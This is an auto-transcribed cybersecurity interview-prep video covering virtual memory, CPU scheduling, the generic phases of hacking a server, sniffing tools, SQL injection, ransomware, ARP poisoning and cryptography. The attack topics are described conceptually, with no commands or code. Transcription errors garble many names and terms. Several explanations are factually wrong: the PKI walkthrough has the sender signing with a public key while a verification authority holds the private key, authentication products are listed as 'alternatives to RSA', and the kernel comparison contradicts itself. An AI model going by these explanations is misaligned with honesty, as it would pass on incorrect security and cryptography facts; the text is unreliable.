document all the steps that they were that you took all the inputs that you put in and it will also record all the errors and it will also record all the mechanisms that were utilized and the errors that were actually generated and that report will be given to the higher level managers who can then forward it to the developers who based on those reports can start their troubleshooting and then the control mechanism comes in you're going to define the issue management process so this process needs to work in a particular manner where you are doing a test you're recording whatever is happening you're creating a report out of it you're sending it to the management the management will then take those reports study them take it to the developers the developers will test based on their criterias they might interact with the testers at that point in time to identify particular flaws and then we might want to record that application on a develop a patch which once installed will mitigate that particular flaw and then it can come back to the testing phase again where you can repeat those tests and validate that the flaw is no longer existed so these are the three steps that would be uh utilized for testing purposes and that brings us to the first 10 questions on the software platform in the next video we'll be looking at operating systems and applications the first question is on virtual memory what exactly is virtual memory for a computer we have two types of memory we first is the primary memory which is your random access memory which is also known as a volatile memory and the secondary memory is your hard disk where your data is stored permanently but for a computer when it has let's say a 4GB memory or a ram as in this scenario on your screen it is going to replicate that and is going to create another 4GB of virtual memory on the hard disk and it is going to use it in tandem along with the ram so if the ram is insufficient the processor is going to utilize the 4GB of the virtual memory that is created on the hard disk and it is going to swap data from the ram to the hard disk this can also be known as a page file or a swap file the next question is what are different scheduling algorithms now the context for this question is you're talking about a processor and you are talking about how processes are going to be fed to the processor and how the process is going to treat these processes so the first is first come first serve so the process which requires the CPU first gets the CPU allocation first now whenever there are processes that are being run by different applications they make requests for some CPU type now in first come first serve the first service or the first process that is going to request some processing time will get that much allocated to them they will run through the process first and in the next and the next and so on so forth the second one is the shortest job first this is the process where the shortest execution time for that process is calculated and that process is selected first for the CPU scheduling this schedule selects the task to work as per priority so there would be some tasks that are marked with high priority some would be normal and some would be low So based on this high normal or low priority uh all the processes will be classified high priority will be dealt with uh first then the normal and in the least priority the fourth option is multiple level queues where processors are assigned to a queue based on the specific property like process priority the size of memory Etc so it will be classified based on the attributes given to that particular process and multiple queues will be created and then based on the attributes the processes will be processed by the CPU then shortest remaining time the process will be allocated to the task Which is closest to its completion so or you look at it this way the process that will take the least time to complete its processing would be chosen first and then the round robin method where each process comes in turn gets an equal share of time so if there are 10 processors each process will be allocated a certain amount of time after which the next process will be processed and so on so forth and it will continue in a round robin fashion till all the processes get executed so in short six different scheduling algorithms depending on how you uh how the operating system deals with it the next question is what are the steps involved in hacking a server or a network so this is more of an ethical hacking question you're looking at devices and for uh and the interviewer asks you uh what kind of steps are involved what are the activities that you would do in hacking a server or a network now there are no specific steps that you would Define because every hack is going to be unique but it has a hack can be classified in five different steps which are quite generic right so the first step will always always be the recognizance step also known as information gathering phase also known as footprinting or fingerprinting uh depending on what exactly you're doing but in this phase the attacker gathers all the evidence all the information that is possible about the targets that they want to attack so here you are trying to get to know the victim so you can launch specific attacks towards them you want to identify what operating system they are utilizing what IP addresses Mac addresses the versions of the operating systems and applications the patch levels find out vulnerabilities find out whatever information is possible find out the information about the a person who's using those computers so you can launch social engineering attacks and so on so forth so the first step is all about gathering enough information based on which you can launch further attacks once you have that information comes the second phase which is known as the scanning phase this is more of a technical phase so yeah in the first step you've got your IP addresses domain names maybe even Network maps and you have identified which devices are available now in the scanning phase you're going to identify live devices and then you're going to scan them for open ports processors protocols Services you're going to identify vulnerabilities you're going to enumerate them to identify more information from them thus at this point in time you will have identified a certain set of vulnerabilities or a certain set of security loopholes that you can misuse once you have identified those you're going to the next step which is the gaining access tape in this you're actually going to execute your attacks based on the availabilities that you have found and you are either going to gain access to that particular system by installing a Trojan or a destroy the system by installing a virus or install a spyware or a key logger whatever you wanted to achieve so in the gaming access phase you would have based on the knowledge that you have gained in the first and the second phase you're going to launch your attacks and you're going to try to gain access to that particular device then the next step is where you're going to maintain that access now that you have hacked into that device it is not necessary that you will always be able to get access to that device uh suppose you have cracked the password of that particular user and the user changes that password after a few days your attack is worthless so what you're going to do here is you're going to maintain your access so this is where it is assumed that you want repeated access to that device and thus you're going to install a keylogger or a Trojan or sub mechanism which will still allow you to get access to that device without the knowledge or the authorization of that particular user and finally the last step is where you are going to cover Your Tracks so whatever activity that you have done so far will have created logs and will have created information based on which the victim will come to know that they have been compromised and may be able to trace that activity back to you so to prevent the user or the victim from realizing that they have been hacked and to prevent them to discover who has hacked them you want to cover your tracks by deleting logs and any references that point to that particular activity you are going to hide the files that you have created so you have installed a Trojan or a keylogger these will create files and directories you're going to hide them so that they are not discovered you're going to hide processes that have been created you're going to try to hide all the activity that you have done so that to conceal the actual attack and preventing the user from realizing that they have been compromised so these are the five steps that will be involved in hacking a server Network application or any Computing device you will come across the next question refers to what are the various sniffing tools now this is a network based attack where you are trying to capture a data package that that have been transmitted over the network and then you're going to analyze them to see if you can capture any sensitive information like usernames passwords Bank details or any anything of that sort now these tools will also depend on which operating system you are utilizing for example MSN sniffer would work on Microsoft operating systems eat the cab would be based on Linux and so on so forth so on the screen you'll see six different sniffing tools that work on different operating systems Wireshark is uh something that is common both on Windows and Linux it is used to analyze Network in detail it is the de facto tool that we will come across in most of your ethical hacking trainings in most of your organizations when they want to do data captures now data capturing or packet capturing is not only done by hackers to gather more information but is also a known troubleshooting technique used by administrators and network administrators to analyze any issues that may be going on in the network right so wow the first tool you see on the screen is Wireshark like we stated is available for Windows Linux as well then there is TCP dump which again has the same capability of Wireshark but is a command line version whereas Wireshark also has a GUI a graphical user interface TCP dumped is available on Linux Amazon sniffer it's a very old tool uh when we had MSN Messengers uh MSN Messenger is no longer there but Microsoft does or did have a Microsoft message analyzer Tool uh which they have stopped development since 2015. but that's another tool that is specific for Microsoft operating systems from Microsoft you are can be installed to gather more information then you've got ETA cap which is a tool to launch man in the middle attacks data capturing and is is essentially a Linux command line based tool then D Smith is another password and network capturing tool which can help you capture data package prominently a Linux 2. same with heat array this is a graphical tool which will allow you to capture data data traffics and map protocols and identify which IP addresses have been communicating with what essentially all of the tools have similar functionality except that some have addition functionality like launching man in the middle attacks or capturing or having specific filters that will help you identify and troubleshoot sub network issues that you may be facing moving on to the next question what is an operating system now this is a very difficult question to answer because uh we normally when we want to answer this question we start off with the functionality of an operating system right we try to describe what Windows does or what Linens does or what Mac OS does and then we are trying to figure out what an operating system is in the first place but an operating system essentially as the slide says is a software program that provides a platform for computer hardware to communicate and operate with the computer software so it is basically an enabler for human interaction with the hardware that you have if you take the operating system out of the question it's just some Hardware which cannot interact with you but essentially when you have operating system like Microsoft Windows or Linux or Mac you're essentially essentially installing an instruction set on that particular device which will allow you to interact and manipulate the hardware to do whatever you want that Hardware to do right essentially when we talk about uh drivers for your various devices like a driver for your Lan card or for your sound card or for your graphics card which allows you to tweak these cards for a functionality right it allows us input and output functions uh for example the basic example you open up Microsoft Office projects like Microsoft Word or Excel and you get a GUI on the screen which you can interact with you got a keyboard and you type on that keyboard and the computer knows what you're typing and reflects those actions on the screen by showcasing it on that particular Excel file or a word file so how does the computer know what to do or what you're exactly intending to do at this point in time it is all the operating system that is providing you all these Services analyzing what your inputs are and then based on the programming it is going to execute that and show it to you on the screen right some of the most common commonly used operating system are Microsoft Windows you have them in desktop as well as server variants Unix Linux again line access desktop and servers you've got Uber 2 in line Max red hat and so on so forth and then you've got Mac OS for Apple related conference the next question what is the difference between micro kernel and macro kernel now the first thing we need to know is what is a kernel kernel is the heart of the operating system that allows that input and output to happen it allows those drivers to be set up so that the hardware can interact with the software and we can then instruct the software and the hardware both to function in a particular manner so there are two types of kernels micro kernels and a macro kernel micro kernel is something that we normally use micro kernels are for operating systems that use processors directly handled by the processor the micro kernel is very small in size macro kernel is large because it basically is an entire image of the operating system the execution for a micro kernel is slow the micro kernel is going to be faster because it is more evolved there's a lot of programming involved extendability micro kernels are easy to extend micro macro kernels are hard to extend as far as security is concerned if a macro kernel crashes it takes everything down with it the entire operating system is going to crash but in case of a micro kernel it is only that particular process that is going to get affected micro kernel there is a lot of coding involved micro kernel less coding is involved examples of micro kernels would be simply an OSS most popularly used on yesteryear phones Nokia's if you remember those uh qnx and so on so forth macro kernels your Linux or BSD operating systems essentially use macro kernels next question what are the different types of operating systems so as you can see on the screen five types of operating systems batched OS distributed operating systems time sharing multi-program and real-time what are batched operating systems the computer operator places the jobs coming from input devices into batches so consider this not from a desktop perspective but from a server perspective where these devices are used by organizations to compute and to crunch some processors that is going to make some business sense out of it so when there are multiple processes coming in multiple jobs that are going to be scheduled a batched OS is going to place these jobs in batches and they're going to Crunch those based on the inputs that have been given by these operators distributed OSS where there are multiple computers which are interconnected and are communicating through networks so in a corporate environment you don't use one single computer to do everything you got a Data Center and the data center will have a cluster of servers where they are going to share some resources to match one particular task right so that's where your distributed OS is coming to the picture then you have time sharing OSS where you are renting some time so time sharing oss minimizes the response time example in today's world Cloud right uh you go on to the cloud you have a virtual service over there you schedule something you schedule the job over there it is uh it is executed and for that time being that operating system Services your particular request and provides you that particular job any application that you see online that is executed for example Facebook from a consumer's perspective could be a time shared experience then multi-programmed OS the operating system uses CPU scheduling to separate jobs so you're scheduling the CPU to complete certain jobs in this particular Manner and in real time OS the operating system gives maximum time to critical operation so it identifies uh the priority of these operations it knows the high priority items the medium low priority items and based on that it is going to execute these critical operations and get the job done moving on to the next question what is the difference between logical address space and physical address space now when you're looking at address spaces this is where applications come into the picture and when you execute an application it is going to create a particular address in the memory where it is going to create a buffer to store its own information so that it can be provided to the processor processed and then can be returned back to the application as an output right so as far as definitions are concerned a logical address is generated during running of an application or a program a physical address is a physical address or a physical location on the memory module itself right visibility you can view a logical address because it is programmed into a computer so if I'm looking at C C plus plus and I'm using malloc or memory allocation that's where the logical address is going to be created where a buffer is going to be created for that program and whatever the user input is going to be it's going to be stored in that buffer but whereas physical addresses are concerned this logical address will be created on a physical store or a physical memory module which will have its own addressing mechanism thus you you can see the memory module where you cannot see the specific address on that particular memory module but as far as a logical address is concerned while you're programming or you're debugging the application it will show you the logical address that has been created the start point and the end point of The Logical address that has been created for that particular program it can be shown in a debugging environment right address space logical and physical address is physical like yeah I just guess it's the memory module itself you can access only the physical address on that particular memory because logical addresses can be viewed but you cannot access them physically uh generation uh The Logical addresses are generated by the CPU during the processing time whereas physical addresses are generated are computed by the memory management unit or the mmu that you have on your computers and as far as logical addresses they will always be they are variable whereas the physical address is always going to be constant looking at the next question what is the difference between logical address space and physical address space so moving on from the previous question to this The Logical address is address created by the CPU for the processes that need to be addressed and that need to be stored as a buffer in the physical memory whereas the physical memory itself is going to be a address that is going to be there on the physical part of that memory which is uh which is going to be assigned to it by the mmu well the next question discusses uh shells so what shells are used in Linux now what is the Shell Shell is the command line interface that we utilize on a Linux machine so the terminal window as we call it is a shell and there are different variations of a shell based on what Linux operating systems you're using the desktop operating systems that you use uh or the server operating systems and real in today's world that you're going to use normally will always have a bash shell which is the first shell that you see on the screen known as a bone again shell it is a default for Linux distribution so as far as end consumers regular consumers are concerned it is always going to be a batch shell a bone again shell that you're going to utilize for scripting and to execute regular commands but when it comes to high level programming or it comes to specialization tasks then you've got the rest of these uh shells that you can utilize for example the ksh known as a conch shell is used for high level programming which supports associative arrays and built-in operations the CSH or the C shell has different functionality like spelling Corrections and drop controls the zsh or the Z Chev provides unique features like file generation startup files and fish friendly interactive shell which provides features like Auto suggestions and configuration so all of these have different functionalities depending on what usage that you have for that particular shell the most common shell like yesterday did is the bash shell that you'll always come across in your desktop Linus operating systems then looking at the next question what are the process States in Linux now what is a process process is basically a service that is running for a particular application for that application to function right this process is going to direct user input to the processor process it get that output back to the application execute it and then show it onto the graphical user interface for the user so in Linux there are five states for a process first is the ready space now in ready in this state the process is created and it is ready to run so it is waiting uh it is waiting for input it's ready uh the application is executed the running is when the process is being executed itself blocked or weight is when user input is being looked upon so it's waiting for user input so that it can do the processing completed or terminated it has completed its execution or was terminated by the operating system for some reason or the other so this is when things have uh the processing has been completed and then lasted state is zombie where the process is terminated but the process table still holds the information maybe it is waiting for the kill request before it gets terminated so these are the five states for a Linux process to be in and that brings us to the 10 questions in the operating system and application space in the next video we'll be looking at 10 more questions on cyber attacks interview questions based on cyber attacks let's start off with the first one the first question is what is SQL injection SQL stands for structured query language which is a language that is used by most of your databases or your relational databases the variations of your database would be MySQL Microsoft SQL Oracle SQL you'll have IBM databases all of these databases utilize the structured query languages to interact with the applications now all of these databases have their own syntax so you'll have to study most of these databases based on which applications and which databases you want to provide security for but as the name suggests SQL injection vulnerability or structured query language injection vulnerability is where a user can maliciously inject a SQL input or a SQL statement in a query and send it to the database and evoke a response response out of it so this vulnerability is not specifically to the database it uh the vulnerability lies more in the application and the coding of that application so when the application receives a query which it needs to be forwarded to the SQL database we need to configure at the application Level of what queries are allowed and what queries are not allowed so there are different various aspects of how to manage a SQL injection vulnerability but the basic flaw lies in the application where uh invalidated input is accepted and sent forward to the database where the database might confuse it into an executable statement and thus create a response that was not warranted there are various types of SQL injections as shown on the screen in band SQL injection where you can look at an error paste or a union based rejection a blind SQL injection where it is either Boolean based or a time-based attack and then an out of bound SQL injection essentially you're looking at databases and you're looking at application security however you want to encourage secure coding practices so in unvalidated input is mitigated the next question is what is spoofing now in spoofing you're basically assuming the identity of another person so here the attacker pretends to be some other person or an organization and sends you an email that appears to be a legitimate email it looks almost genuine it has been constructed to replicate what a genuine email would have been and it is very difficult to spot a fake one there are different ways to identify whether an email is genuine or not but that's for a different video moving on to the next question what is a distributed denial of service attack or a DDOS attack now generally a denial of service attack is an attack where legitimate users are prevented access to the resources that they legitimately can access right so for example if it is a bandwidth-based attack the attacker consumes the bandwidth of the network in such a way that there is no more bandwidth left for legitimate users to access the network now a single device may not be able to generate that much amount of traffic to consume the bandwidth of a huge server thus the attacker will construct a botnet and through that botnet they will launch a distributed denial of service attack to the Target victim right so a botnet uh there are two terms that you want to look at over here the first term is a bot and the second one being the botnet itself bot is a software that once installed on a victims machine allows the hacker to send remote commands to that machine that will make it to generate some activity once we have enough machines on which such Bots have been implemented the collection of these machines would be known as a botnet so an attacker would then instruct this entire botnet to start generating data traffic to be to be sent to the targeted Network or to the targeted server which will then bog down the server thus crashing it and preventing users from accessing that particular resource the next question is how to avoid ARP poisoning or ARP now first let's understand what ARP is ARP stands for address resolution protocol which is a protocol used by computers to communicate over the network once you compute a boot drop it starts our Discovery process of identifying its neighbors so if I'm in a particular subnet my machine will proactively send out ARP requests and address resolution protocol to find out which other machines are within the same network and which are live once it sends out a query a live machine will respond to that query along with its Mac address this information is dense stored in what is known as a ARP table or an ARP table on the machine's cache so whenever my machine now wants to send out a packet to this particular machine it will go to the ARP table it will identify the IP address and the associated Mac address it will print that onto the data packet as a destination uh IP and destination Mac and send that packet across the switch the switch will then identify the MAC address and send the packet to the relevant machine that is connected to that particular switch now to confuse the switch into sending it to a different machine so our poisoning attack is created this attack is generally launched to create a man in the middle attack now to prevent this Arc poisoning from happening in the first place there are three different aspects that we can utilize first we can use packet filtering which will filter filter out and block packets that are the same Source address data so you have identified some malicious IP addresses and you want to block out some IP addresses so you're using a packet filter firewall where you have constructed the firewall to filter out certain packets originating from particular range of IP addresses this firewall and this technique will then block those kind of packets coming in second keeping away from trust relationships organizations will develop protocols that do not depend on trust relationships and thus you want to keep this protocol away from there once you have created a trust relationship these machines should not be sending out ARP requests to other machines in the first place since the trust relationship has been defined and these machines know whom to communicate with such kind of protocols should then be disabled or you can use Erp spoofing software so there are some there are softwares out there that will look for ARP spoofing and prevent that from happening in the first place so if somebody has sent out a spoofed ARP packet that packet will be picked up by this software and it will be mitigated of network visualizers like glass wire antiviruses like so force uh they have inbuilt capabilities of identifying uh our apps moving attacks and mitigate them in the first place in the next question we are going to discuss what is ransomware now ransomware is a type of malware that blocks victims to access personal files and demands Ransom to regain access there are three categories before we go into the categories let's just revisit what ransomware is let's start with the word malware malware is a malicious software that poses as a legitimate software but has a payload that will have a security impact on your machine so in this instance viruses Trojans all of these can be classified under Maldives so can Ransom which a Trojan is a software that will give you a backdoor access to a to a particular device a virus will do some destructive activity on that device a ransomware will basically encrypt the data of that particular user from on that particular machine thus rendering that my that data inaccessible to the users themselves and in turn will demand Ransom to provide access to that particular data so the three types of ransomware's the first one is square wear which uses social social engineering to cause anxiety or the perception of a threat to manipulate users into buying unwanted software so this preys on the gullibility of humans where you can see a pop-up appearing on your screen which can scare you into believing that you may have been attacked or there is a virus on your machine and then instructs you to download a particular software to mitigate that particular virus now the malware will be in this software that you will be downloading and then a ransomware will be installed and your data will be encrypted screen lockers where login uses computers by preventing them from logging in and displaying an official looking message you will see a screen saver once you boot up which prevents you from accessing the login page so it will not allow you to log into your own machine but it will give you a warning that your data has been encrypted and you need to connect to a particular email address and send bit to send Bitcoins over there to get a decryption key to access your own data and then the encrypting ransomware displays a message demanding payment in return for the private symmetry key which is needed to decrypt the symmetric keys for encrypted file so once your files have been encrypted you might just have a blank screen in front of you where you'll receive a warning message where it instructs you to pay up a ransom in Bitcoins or in some cryptocurrency to some particular digital e-wallet which is not traceable and once you make that payment they will send you the decryption key and then you can access your data if getting your learning started is half the battle what if you could do that for free visit skillup by simply learn click on the link in the description to know more then talk talking about the next question what is the difference between an active and a passive Cyber attack now when we talk about cyber attacks Cyber attack is a activity that is caused by a malicious user who wants to try to get access or do some security incidents on the victim's devices so there are two ways that can happen it's either in an active manner or a passive manner in an active manner the Intruder attempts to disrupt a Network's normalcy modifies data and tries to alter the system's resources so this is more active where the attacker will proactively try to destroy the network so that Communications fail or they might try to modify the data where uh we're using a ransom where they can encrypt it or they might delete that data using a virus or steal the data using a Trojan or they might even alter the data so that it is no longer trustworthy whereas in a passive attack the Intruder intercepts data traveling through a network here the into the eavesdrop but does not modify the message so they're just listening in they're just observing what is going on they are not manipulating the data they are not stealing anything it's just that they are monitoring the activity that's going on then the next question what is a social engineering attack now social engineering attack is a people-based attack the victim here is the Human by itself the vulnerability also lies in the human it may be executed through a computer but end of the difficult abilities of the human so it is the art of manipulating people so that they end up giving up confidential information now we always read in the papers where somebody got manipulated their passwords got hacked and somebody's life savings got wiped out right because they shared the OTP with someone or they shared of the password with someone now creating a scenario where these people will fall prey to this attack and share this kind of personal information to unknown people that is where the social engineering attack comes in creating that scenario which will ensure that these people give out this confidential information now there are three categories in this attack the first one is a phishing attack second is a spear phishing attack and a third is a railing attack now phishing attack is basically a generic attack it is targeted To The World At Large whoever Falls prey to that attack will be a victim whereas a spear phishing attack is a targeted attack towards a specific individual or a group of individuals or towards an organization so there is a lot more research that goes into spear phishing where you analyze the victim you try to figure out what their vermilities are and you tailor make or you customize the attack to that particular vulnerability once you have that attack you launch it against those people those people will then fall prey to this attack and a wailing attack is where you're attacking uh top level Executives so the c-level executives of an organization politicians movie stars wealthy and powerful people so any of these people when they're attacked it will be known as a wailing attack next question what is man in the middle attack now this is something that we are touched base when we talked about ARP where the ARP poisoning attack needs to be executed to leverage a man in the middle attack now in the man in the middle attack the attacker attacking computer takes the IP address of the client unaware of this the server continues to communicate with the attacker now if you remember in a previous question we have also talked about spoofing so in this scenario uh attacker has spoofed their IP address to replicate themselves as a genuine client and now with that spoofing in mind they might either throw our poisoning attack or just because of the spoofed IP address become a man in the middle that means that they are now eavesdropping on the conversation between the actual client and the server by imposing themselves as a server in this scenario the attacker is now a go between between the client and the server and can eavesdrop and can copy the data if they want they can modify the data as well so as you can see on the screen the attacker becomes man in the middle which means that they are now eavesdropping on the conversation that is happening between the client and the server the next question who are blackout hackers and Whitehead hackers the main thing is the differentiation between a black hat hacker and a wildcat hacker now a blackhead hackers are skilled individuals who illegally hack into a system the motive behind such an attack is mostly for monetary gain these individuals are known also known as security crackers now if you look at your criminal hackers those who have malicious intent those who do hacking for the intent of personal gain or for the matter of disruption the main thing that black hat hackers lack is authorization they are not authorized to do the activity that they are about to do and they are going to get unauthorized access to devices or to data which is going to cause losses to the organization involved whereas on the other side a white ad hacker or also known as ethical hackers these are the individuals who discover vulnerabilities in a computer network and they help the organizations mitigate these vulnerabilities they help the organizations defend themselves from black hat hackers so the main difference between these two types of hackers a blackhead and a white hat is the intent and the authorization so black hat hackers will have malicious intent they will try to personally gain from that attack from by finding your vulnerabilities they also will not have authorization to conduct whatever activity they are doing whereas on the other side Whitehead hackers will be hired by organizations they will provide authorization for certain activity that the Whitehead hacker can do to find out those vulnerabilities once those vulnerabilities have been found found out by the white hat hacker they will report it to the management and guide them in implementing security controls to mitigate those vulnerabilities the main difference between a blackhead and a white hat is the authorization and the intent the next question what are honeypots now honeypots are a very interesting device that can be introduced in a network uh these basically are decoy servers that are implemented in a network to attract the attention of attacker it is there to lure an attacker uh into uh attacking that particular device thus creating a security blanket blanket for the rest of the devices so if an attacker has been able to bypass a firewall and is now trying to scan a particular Network when they Scan they will come across various devices that are there in the network they will then proceed to do a vulnerability scan on these devices the Honeypot at that point in time will provide us and approve as an attraction to these attackers because it will demonstrate some vulnerabilities to the hacker which will divert their attention so these vulnerabilities are simulated on these devices these actually do not exist but the moment the attacker then starts interacting with the Honeypot the Honeypot will identify that as a malicious traffic and will warm the warn the administrator about a possible attack that is going on the administrator will then investigate through the Honeypot of what activities going on and then reconfigure the security controls to block the attacker or mitigate the attack itself right so it is more of a decoy server that will showcase or simulate some vulnerabilities to an attacker thus to lure them and Safeguard the rest of the network these are the 10 questions for cyber security in the next video we'll be talking about cryptography the first question Define cryptography encryption and decryption now cryptography is used by Security Professionals to scramble data into non-readable format which is used in securing that information so it involves converting data from a readable format into a non-readable format and then reversing it back to readable format again for example the word computer is now scrambled into looking like an unreadable format now if you look at this word that it has been scrambled into it would be very difficult for a human to figure out what the actual world was now in this scenario we have taken an algorithm where we have made a shift of the alphabet where we have added two alphabets the current one so C plus 2 becomes e o plus 2 becomes q m plus 2 becomes o so we have done a shift of 2 and thus the key over here for this algorithm is the alphabet plus two so any person who figures that out will be able to unscramble this and convert this back into readable text the fact of scrambling a readable text Data into something that is unreadable by using a particular key is What cryptography is all about now as we discussed the decryption again is uh replacing the alphabet and taking it further back by two characters so e minus two becomes c q minus 2 becomes o o minus 2 becomes M and so on so forth so anybody who knows this key uh the shift key anybody will able to decrypt this particular character so this depends on the user if I want to utilize alphabet plus five then the spacing the shifting of that character will be the fifth character from that particular character and so on so forth the next question what is the difference between ciphertext and clear text ciphertext refers to the text which is encrypted and totally undesirable the message received after decryption is known as clear text this text is comprehensible so the word computer is clear text that means that it has not been treated to any cryptographic measures it does what it is intended to be however if the moment we encrypted that means we scramble it into unreadable text by using any of the algorithms that we'll be looking at that text is known as a cipher text and without the key this becomes unreadable the clear text as discussed is the plain word that we have utilized we are using the English language in this instance so the plain word computer is the clear text once we add the encryption layer to it we get the cipher text to it moving on to the next question what is a block Cipher this refers to the method of encrypting the plain message block by block the plain message is broken down into fixed size blocks and then encrypted now a block Cipher is normally used for data that is stored so a data that is stored on a hard disk and we want to encrypt that data that is known as block encryption or a block Cipher so block Cipher is an algorithm that will allow you to encrypt data that is stored onto a hard disk so in this example we've got plain text which is 64 bits in size and we have added a layer of encryption to it so plain text plus the key that we have studied in the previous questions and then The Scrambled data out of it which is unreadable and thus encrypted then the next question what is public key infrastructure now the public key infrastructure is a set of policies which secures the communication between a server and a client it uses two cryptographic keys public and private so the infrastructure itself is a set of policies people procedures and techniques which are standardized in nature and are globally accepted which allow us to use digital certificates to encrypt data and decrypt the data at the other end we use a symmetric encryption over here which means that we are used two keys one is a public key to encrypt and the private key to decrypt the other part of your encryption is a symmetric encryption where the same key is used to encrypt and the same key is used to decrypt now in a public key infrastructure uh like I said we have standardized that so in the standardizing part of it these are the various players that have been defined in the public key infrastructure the first is this user or the sender in the scenario the one who requires this digital signature to directly sign a particular transaction or a communication a registration Authority with whom they are going to register for that particular key the certification Authority who issues that key the verification Authority who validates the uh key itself and the recipient who's going to be the other party of that particular transaction so how is this utilized a sender or the user who requires this digital signature will request or apply for a digital signature with the registration Authority the registration Authority would validate the genuinity of the user so they might do some identity verification or uh proof of residence or something like that once they have identified the person and they have validated the information table then send the request to the certification Authority stating that the sender has been validated and we can and the certification Authority can issue the digital certificate to the particular user they will send the public key to the sender which will be utilized by the sender for further transactions so when the sender is going to sign some data and uh wants to send it across to the recipe and they will use the public key to sign it and send it across the recipient will then validate with the verification authority to see if the data the signed data is correct or not now why the certification Authority sends the public key to the sender the certification Authority updates the private key with the verification Authority so whatever is signed by the sender received by the recipient and they want to validate it they will send it back to the verification Authority the verification Authority will validate using the private key once the private key is validated it will then send the OK signal back to the recipient thus allowing the validation of that particular transaction if the signature is tampered with or is not the very fiction Authority is not able to validate the signature it will then send a denial message back to the recipient and the transaction will not go through so the PK enables trusted digital identities for people so the pki grants secure access to digital resources based on the infrastructure that has been created and the core of the pki is a certification Authority which ensures that the trustworthiness of the Digital Data is ensured so going back to the previous slide these are the key players that have been standardized in the public key infrastructure the certification Authority is the authority that issues the digital certificates the validation Authority is the one who validates that digital certificate moving on what is RSA RSA is one of the first public key crypto systems that is used for secure data transmission it stands for ravesh Shamir and Edelman now these are the three people who have created this algorithm rather West atishamir and Leonard Edelman who are the inventors of this technique it is a asymmetric cryptography algorithm which works on both public and private Keys hence the encryption key is public and the decryption key is kept private now as we have discussed earlier symmetric and asymmetric cryptography symmetric cryptography is where the same key is used to encrypt and decrypt whereas a symmetric cryptography is where there are two keys to encrypt and decrypt the algorithm what are the few alternatives to our essay now RSA is an algorithm that is used for encryption there are a lot of other algorithms that can be utilized to alter or do scramble data depending on your requirements so in the previous question we have studied and we have talked about what RSA is it stands for uh three creators of that particular algorithm but there are a lot of alternatives to this algorithm depending on how secure you want that data to be and some of them are listed here on your screen Duo security OCTA Google Authenticator and last cost LastPass is a password manager so is Duo security Google authenticate is something that we all utilize it is an application that you can download and store on our mobile devices and we can set that up to authenticate ourselves with certain portals so it issues a unique ID to us which once utilized will allow us access to those particular portals OCTA is an identity manager where you have created different digital identities and you have assigned them certain permissions and based on your authentication mechanisms OCTA will allow or disallow access to those different applications or different portals as you have configured it so all four or authorization authentication mechanisms which can be used as alternatives to RSA if getting your learning started is half the battle what if you could do that for free visit scale up by simply learn click on the link in the description to know more next question what are the prime objectives of modern cryptography and this is a very important question because we've we've so far looked at what cryptography is and what public key infrastructure is but what is the achievement out of it why are we utilizing it and what do we want to gain out of it so the main and the prime objectives of modern cryptography are as follows uh mentioned on your screen the first one is confidentiality the second one is non-repudiation third one is authenticity and the fourth one is integrity now if I go back to the first one confidentiality uh that is where I want to keep data confidential that means it will only be visible to the authorized users right so here I have created a list of people who have deemed as authorized users and have created a digital identity to them and have given access controls to those people now that is how confidentiality is insured so when we want to keep data confidential we create a list of users who we are going to allow access to certain resources and we are going to Define what access controls are to be utilized what access are allowed whether they've got an administrative access or user level access and only those authorized users are going to be able to access these resources that is how we maintain confidentiality the next one is non-repudiation non-reputation is the prevention of denial of having been a part of that particular transaction so in the public key infrastructure that we discussed where a digital signature was utilized to sign a particular transaction and then sent to the recipient the sender would not be able to deny of having originated the transaction because it was using their digital certificate thus non-reputation comes in the picture uh one more example that we can have here is on our mobile phones when we use SMS short messaging service and we send a message to uh to another person the person when they receive a message the number is validated by the service operator and thus the sender cannot deny having sent that message the sender at the same time can have a delivery report sent to them from that the message was delivered to the inbox of the recipient and thus if the recipient denies having received that message the delivery report becomes proof of having that message being delivered to their inbox thus both the parties cannot deny of have a of being a part of that particular transaction then comes the part of authenticity now in confidentiality we have created a digital identity assigned it to a particular person and we have given them digital signatures where they cannot deny having being a part of that transaction but authenticity is the part where they try to prove that they are who they claim to be so if I am claiming a digital identity I have to prove that I am that person who I'm Who I'm trying to claim to be and an example to that is when we go to our gmail.com websites it first asks us what is our username our username is normally our email address which identifies the account that we are trying to access right so this account is confidential because it is only authorized for a particular person and once they identify themselves by identifying the email address that's when the authentication part comes into the picture where it asks for the password now it has never ever happened that we just go on to the gmail.com type in a password and then it figures out which account we are talking about so the first step is always called the confidentiality part where we identify which account we are talking about and then we try to authenticate as the owner of that particular account by providing the appropriate password to that account if both of these match only then do we get access to that account and we are able to make uh whatever transactions we want to make now when we are making those transactions non-repidation comes into the place where all our activities also being logged so we have identified our account we have authenticated ourselves by providing the password so the proof is there that it is us who are trying to access it and then whatever activity we do send an email receive an email delete something attach something all of those activities are logged and stored as proof of what actions have been done so tomorrow if we deny having sent an email gmail can still prove to us through those logs that though that that activity was done by us and the fourth part is integrity which ensures that the data received and sent and sent by the sender and received by the recipient has not been modified while in motion so the Integrity part is the trustworthiness of that data that the data has not been modified by any hacker or any other entity and is still trustworthy so these are the four Prime objectives of modern cryptography once I have scrambled that data using my Public's signature it is only my private signature that is going to decrypt it right using these mechanisms I will be able to achieve all these four aspects of cryptography and security next question what is safer now c4 stands for secure and fast encryption routine which is also a block Cipher as we have discussed previously block Cipher is a cipher that is used to encrypt data that is stored so it has a 64-bit block size and byte oriented algorithm uh safer's encryption and decryption procedures are highly secure this technology is widely used in applications like digital payment cards so when you are using uh a digital payment gateway to make transactions so you have we have gone on to an online portal you want to purchase a particular item and then it takes you to another payment Gateway where you have to fill in your credit card information sensitive information like your uh expiry dates CVV information and then the OTP or the password that you have created for your particular account now all of these need to be secured or highly secured based on PCI DSS which is the payment card industry data security standard so these standards ensure that certain Protocols are utilized to attain that level of security safer is one of those block ciphers that is used under the digital payment Gateway infrastructure next question how does the public infrastructure public key infrastructure work now we have already discussed this in the previous diagrams uh we have identified the key players the certification Authority the registration Authority the end user who requires the digital certificate the validation Authority who's going to validate it and then the recipe and the end user with whom the transaction is going to be uh conducted so the first point here is the request for the digital certificate is sent to the registration Authority they validate it and then they okay to the certification Authority who then process the request and the digital certificate is issued to the person who has requested it so when the person wants to conduct that transaction they use that uh digital certificate to sign that transaction with the end user the end user validates that with the validation Authority and once validated the transaction goes through and now the last question what is the Blowfish algorithm it is a 64-bit symmetric encryption algorithm so this is an algorithm that uses the same key to encrypt and the same key to decrypt the same secret Keys used to encrypt and decorate the messages here the operations are based on exclusive ores and additions to on 32-bit words the key has a maximum length of 448 bits now this is a little bit technical uh you might not want to go this technical in a in an interview question you just need 